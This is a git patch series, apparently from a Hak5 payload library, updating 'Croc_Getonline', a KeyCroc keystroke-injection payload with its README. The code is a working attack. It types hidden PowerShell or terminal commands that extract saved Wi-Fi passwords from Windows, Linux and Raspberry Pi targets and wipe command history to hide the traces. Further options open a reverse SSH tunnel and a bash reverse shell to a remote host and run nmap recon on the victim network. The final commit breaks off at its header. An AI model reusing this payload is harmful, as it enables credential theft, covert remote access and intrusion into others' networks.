From 691ec577f4f8733bf6b5c2fa1523c47af68899d4 Mon Sep 17 00:00:00 2001 From: spywill Date: Wed, 19 Jul 2023 05:59:08 -0400 Subject: [PATCH 1/9] Update README.md update for new options --- .../credentials/Croc_Getonline/README.md | 99 ++++++++++++++----- 1 file changed, 77 insertions(+), 22 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 17db8c2..5650908 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -1,8 +1,9 @@ # Croc_Getonline ## INTRODUCTION : - - This project is developed for the HAK5 KeyCroc - - Attempt to connect Keycroc automatically to target wifi access point. + - This project is developed for the HAK5 KeyCroc. + - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel. + - Payload will use KeyCroc MATCH command to perform specific tasks. * **TESTED ON** - Windows 10 @@ -12,29 +13,83 @@ ## INSTALLATION : - Enter arming mode on your keycroc to install file. - - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** + - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**. -## STARTING GETONLINE : +## STARTING CROC_GETONLINE : - - After install plug into target and type in anywhere - - **getonline_W** <-- MATCH word for windows - - **getonline_L** <-- MATCH word for Linux - - **getonline_R** <-- MATCH word for Raspberry pi - - When the payload is done running the LED will light up green - - Keycroc should now be connected to target wifi access point - - NOTE: for linux edit payload for passwd needed for sudo permission +After install plug into target and type in anywhere: + - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point + - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point + - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point + - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD ) + - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID + - **`getonline_K`** MATCH word for killing keycroc wlan0 interface + - **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE + - **`getonline_H`** MATCH word for entering ATTACKMODE HID + - **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL + - **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET + - **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot + +* **LED STATUS** + - **`LED WHITE`** Entering ATTACKMODE + - **`LED ATTACK`** Retrieving wifi access point credentials + - **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point + - **`LED GREEN`** Successful connection to wifi access point + - **`LED RED`** Payload failed + - **`LED CYAN`** Performing recon scan + +**NOTE:** for linux edit payload for password needed for sudo permission. + +## PAYLOAD OPTIONS : + +Editing payload variable options: +- **`option=0`** + +This option will run payload as normal, attempt to connect Keycroc to wifi access point. + +- **`option=1`** + +This option will run payload as normal, after a successful connection open terminal on target and start ssh session. + +( EDIT PAYLOAD FOR KEYCROC PASSWORD ) + +- **`option=2`** + +This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. + +( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) + +SSHPASS is a requirement for this option, payload will attempt to install if not installed. + +- **`option=3`** + +This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + +( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) + +* **RECON SCAN OPTION** + +The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. + +- **`recon=off`** + + - Suppresses active reconnaissance to maintain stealth. + - Useful for discreet scanning in sensitive environments. + +- **`recon=on`** + + - Initiates basic network reconnaissance scans. + - Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt. ## PAYLOAD INFO : -**PowerShell script that performs the following actions:** +- **PowerShell script that performs the following actions:** Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. +Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script. -Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. -Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script. - -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. @@ -42,7 +97,7 @@ Gets the password for the current wireless network by searching for the SSID in Writes the SSID and password to a file located at $MOUNT_POINT using tee. Unmounts the volume at $MOUNT_POINT using umount, and exits the script. -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. @@ -54,24 +109,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". -**-Sed command that performs the following actions:** +- **Sed command that performs the following actions:** By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: -1{x;s#^#sed -n 1p wifipass.txt#e;x} +- 1{x;s#^#sed -n 1p wifipass.txt#e;x} -1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s +1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. -10{G;s/\n(\S+).*/ \1/} +- 10{G;s/\n(\S+).*/ \1/} 10{..} executes the commands between the ellipses on the tenth line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. -11{G;s/\n\S+//} +- 11{G;s/\n\S+//} 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. From ec819336d7edb9139ac7cf24e558b70e363ad531 Mon Sep 17 00:00:00 2001 From: spywill Date: Wed, 19 Jul 2023 06:02:58 -0400 Subject: [PATCH 2/9] Update Croc_getonline.txt minor changes new options recon, ssh keycroc MATCH command perform specific tasks --- .../Croc_Getonline/Croc_getonline.txt | 412 ++++++++++++++---- 1 file changed, 329 insertions(+), 83 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 64009c0..64f18cf 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt @@ -1,118 +1,364 @@ # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point -# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt +# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 3.5 +# Version: 4.1 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro -MATCH (getonline_W|getonline_R|getonline_L) +# getonline_W <-- MATCH word for windows, Attempt connection to access point +# getonline_L <-- MATCH word for Linux, Attempt connection to access point +# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point +# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD ) +# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID +# getonline_K <-- MATCH word for killing keycroc wlan0 interface +# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE +# getonline_H <-- MATCH word for entering ATTACKMODE HID +# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL +# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET +# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot -CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) -for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done +MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) +QUACK LOCK -wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt +#---> Edit payload option below +option=0 +keycroc_password=hak5croc +wifi_pass=/tools/wifipass.txt -if [ -f $wifi_pass ]; then - cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt - rm -f $wifi_pass +#---> Edit remote host below +remote_user_name=EDIT_REMOTE_USERNAME_HERE +remote_host_ip=EDIT_REMOTE_HOST_IP_HERE +remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE +port=7000 + +#---> Edit known SSID and password below +known_ssid=EDIT_KNOWN_SSID_HERE +known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE + +#---> Edit recon scan on/off below +recon=off +recon_loot=/root/udisk/tools/Target_SSID.txt + +#---> Edit Linux target password below +if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) +else + target_password=ENTER_LINUX_PASSWORD_HERE fi -ATTACKMODE HID STORAGE -Q DELAY 5000 -LED ATTACK +recon_scan() { + if [ "$recon" = "on" ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi + elif [ "$recon" = "off" ]; then + : + else + : + fi +} + +ENTER_STORAGE() { + if [ -f ~/udisk$wifi_pass ]; then + cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt + rm -f ~/udisk$wifi_pass + fi + ATTACKMODE HID STORAGE + QUACK DELAY 5000 + LED ATTACK +} + +RESET_PAYLOAD() { + QUACK UNLOCK + sleep 5 ; LED OFF + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +CLEAN_UP() { + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "history -c ; rm -f ~/.bash_history" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi +} case $LOOT in getonline_W) - Q GUI r - Q DELAY 3000 - Q STRING "powershell -NoP -NonI -W Hidden" - Q ENTER - Q DELAY 5000 - Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" - Q ENTER - Q DELAY 3000 - Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" - Q ENTER - Q DELAY 2000 - Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" - Q ENTER - Q DELAY 2000 - Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" - Q ENTER - Q DELAY 5000 - Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK GUI r + QUACK DELAY 3000 + QUACK STRING "powershell -NoP -NonI -W Hidden" + QUACK ENTER + QUACK DELAY 5000 + QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" + QUACK ENTER + QUACK DELAY 3000 + QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\"" + QUACK ENTER + QUACK DELAY 5000 + recon_scan + CLEAN_UP + QUACK STRING "exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_R) - Q CONTROL-ALT-d - Q CONTROL-ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "umount \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_L) - if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then - PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$target_password" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "sudo umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID +;; + getonline_N) + LED B + sleep 2 + echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass +;; + getonline_F) + if [ -f ~/udisk$wifi_pass ]; then + LED B + sleep 2 else - PC_PW=LINUX + LED R + RESET_PAYLOAD fi - Q CONTROL-ALT-d - Q ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" - Q ENTER - Q DELAY 2000 - Q STRING "$PC_PW" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "sudo umount \$MOUNT_POINT ; exit" - Q ENTER +;; + getonline_K) + ifconfig wlan0 down + LED R + RESET_PAYLOAD +;; + getonline_S) + ATTACKMODE HID STORAGE + RESET_PAYLOAD +;; + getonline_H) + ATTACKMODE HID + RESET_PAYLOAD +;; + getonline_P) + ATTACKMODE HID SERIAL + RESET_PAYLOAD +;; + getonline_A) + ATTACKMODE HID AUTO_ETHERNET + RESET_PAYLOAD +;; + getonline_X) + LED R + rm -f /root/udisk/payloads/Croc_getonline.txt + rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt + rm -f $recon_loot root/udisk/config.txt + apt -y remove sshpass + reboot --force ;; esac - -ATTACKMODE HID sleep 3 -LED SETUP -kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) +word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w) +if [[ $word_count -eq 2 ]]; then + ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)" + matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')" + sleep 1 + if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then + LED SETUP + else + LED R + RESET_PAYLOAD + fi +else + LED R + RESET_PAYLOAD +fi + +kill -9 $(pidof wpa_supplicant) +kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then - sed -i '0,/./s/^.//' $wifi_pass - sed -i 's/\r//g' $wifi_pass + sed -i '0,/./s/^.//' ~/udisk$wifi_pass + sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass + sed -i 's/\r//g' ~/udisk$wifi_pass fi -sed -i 's/\( \)*/\1/g' $wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt -wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf +sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass +sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt +wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf + ifconfig wlan0 up -wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 +wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf +dhclient wlan0 sleep 3 systemctl restart ssh.service -[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R +if : >/dev/tcp/8.8.8.8/53; then + if [ $option -eq 0 ]; then + : + elif [ $option -eq 1 ]; then + case "$LOOT" in + getonline_W) + QUACK GUI m + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 5000 + ;; + getonline_R) + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + ;; + getonline_L) + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + ;; + esac + QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$keycroc_password" + QUACK ENTER + elif [ $option -eq 2 ]; then + status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" + if [ ! $? = 0 ] || [ ! "$status" = installed ]; then + apt -y install sshpass + else + : + fi + sleep 1 + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null + rm -rf ~/.ssh 2>/dev/null + ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 1 + ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip + else + LED R + sleep 1 + fi + elif [ $option -eq 3 ]; then + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + /bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 & + else + LED R + sleep 1 + fi + else + LED FINISH + fi + LED FINISH +else + LED R +fi + sleep 3 LED OFF +QUACK UNLOCK + +if [ "$recon" = "on" ]; then + LED C SLOW + echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot + ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass) + iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot + echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot + ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot + cat /etc/resolv.conf | grep nameserver >> $recon_loot + + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot + calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" + echo "$network_range" + } + perform_nmap_scan() { + local network_range=$1 + nmap -T4 -F $network_range >> $recon_loot + } + network_range=$(calculate_network_range) + perform_nmap_scan $network_range + + echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot + curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot + echo -ne "\n\n" >> $recon_loot + LED OFF +elif [ "$recon" = "off" ]; then + : +else + : +fi From 55053ddffb8a46ab7bab22ad4c54a866402f944f Mon Sep 17 00:00:00 2001 From: spywill Date: Sat, 22 Jul 2023 08:43:41 -0400 Subject: [PATCH 3/9] Update README.md minor changes --- .../credentials/Croc_Getonline/README.md | 39 ++++++++++++------- 1 file changed, 25 insertions(+), 14 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 5650908..4382462 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -29,6 +29,7 @@ After install plug into target and type in anywhere: - **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL - **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET - **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot + - **`getonline_T`** MATCH word for Stopping ICMP/PORT alert * **LED STATUS** - **`LED WHITE`** Entering ATTACKMODE @@ -37,6 +38,7 @@ After install plug into target and type in anywhere: - **`LED GREEN`** Successful connection to wifi access point - **`LED RED`** Payload failed - **`LED CYAN`** Performing recon scan + - **`LED RED FLASH`** ICMP/PORT alert **NOTE:** for linux edit payload for password needed for sudo permission. @@ -45,29 +47,25 @@ After install plug into target and type in anywhere: Editing payload variable options: - **`option=0`** -This option will run payload as normal, attempt to connect Keycroc to wifi access point. + - This option will run payload as normal, attempt to connect Keycroc to wifi access point. - **`option=1`** -This option will run payload as normal, after a successful connection open terminal on target and start ssh session. - -( EDIT PAYLOAD FOR KEYCROC PASSWORD ) + - This option will run payload as normal, after a successful connection open terminal on target and start ssh session. + - ( EDIT PAYLOAD FOR KEYCROC PASSWORD ) - **`option=2`** -This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. - -( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) - -SSHPASS is a requirement for this option, payload will attempt to install if not installed. + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. + - ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) + - SSHPASS is a requirement for this option, payload will attempt to install if not installed. - **`option=3`** -This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + - ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) -( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) - -* **RECON SCAN OPTION** +* **Configuring RECON scan with recon=on andrecon=off** The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. @@ -81,6 +79,19 @@ The options recon=off and recon=on play a key role in performing basic recon sca - Initiates basic network reconnaissance scans. - Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt. +* **Configuring ICMP and Port Alerts with alert=on and alert=off** + +- **`alert=on`** + + - ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules. + - Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules. + +- **`alert=off`** + + - If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up. + +To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts. + ## PAYLOAD INFO : - **PowerShell script that performs the following actions:** @@ -130,4 +141,4 @@ s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. -s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. +s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. From 19f2907265a166dbd96cfc9440611f4dbeb4c687 Mon Sep 17 00:00:00 2001 From: spywill Date: Sat, 22 Jul 2023 08:46:14 -0400 Subject: [PATCH 4/9] Update Croc_getonline.txt minor changes added ICMP and Port Alerts --- .../Croc_Getonline/Croc_getonline.txt | 118 +++++++++++++----- 1 file changed, 89 insertions(+), 29 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 